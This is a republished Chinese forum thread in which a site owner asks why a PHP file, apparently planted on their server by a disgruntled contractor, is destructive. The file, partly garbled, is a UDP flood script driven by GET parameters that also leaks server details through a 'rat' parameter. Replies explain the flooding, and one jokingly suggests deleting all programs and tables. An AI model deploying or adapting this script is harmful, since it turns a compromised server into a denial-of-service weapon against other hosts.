Maison  >  Article  >  développement back-end  >  大家帮看上这个文件为啥对网站有破坏性

大家帮看上这个文件为啥对网站有破坏性

WBOY
WBOYoriginal
2016-06-13 13:19:05813parcourir

大家帮看下这个文件为啥对网站有破坏性?

PHP code
<!--

Code highlighting produced by Actipro CodeHighlighter (freeware)
http://www.CodeHighlighter.com/

--><?php set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
        if (StrLen($_GET['rat'])<>0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        echo "Warning to: opening";
        exit;
    }

for($i=0;$i $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
    }
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?> 



------解决方案--------------------
对目标服务器的网络 不断的发送垃圾数据包.这是给人埋了地雷?
------解决方案--------------------
不知道楼主想干嘛!
------解决方案--------------------
你这个代码是从哪弄出来的?怎么解决?在服务器上发现的?
------解决方案--------------------
死循环
------解决方案--------------------
ignore_user_abort(True)加上不休息的死循环
------解决方案--------------------
探讨

ignore_user_abort(True)加上不休息的死循环

------解决方案--------------------
探讨

这是我在广州的一个普通托一个公司做的网站,那个公司的哥们跟公司之间有过节,在工作中带有情绪。

我觉得这样的人不配写代码,太没人品,没职业道德的家伙!

------解决方案--------------------
ignore_user_abort(True);这个好!
------解决方案--------------------


干嘛不删除所有程序和表?
这样多直接、

原来消耗php服务器资源就是这样耗啊、
了解了知识、不错、
Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Article précédent: php模拟post模式打开页面 Article suivant: php幻术方法call详解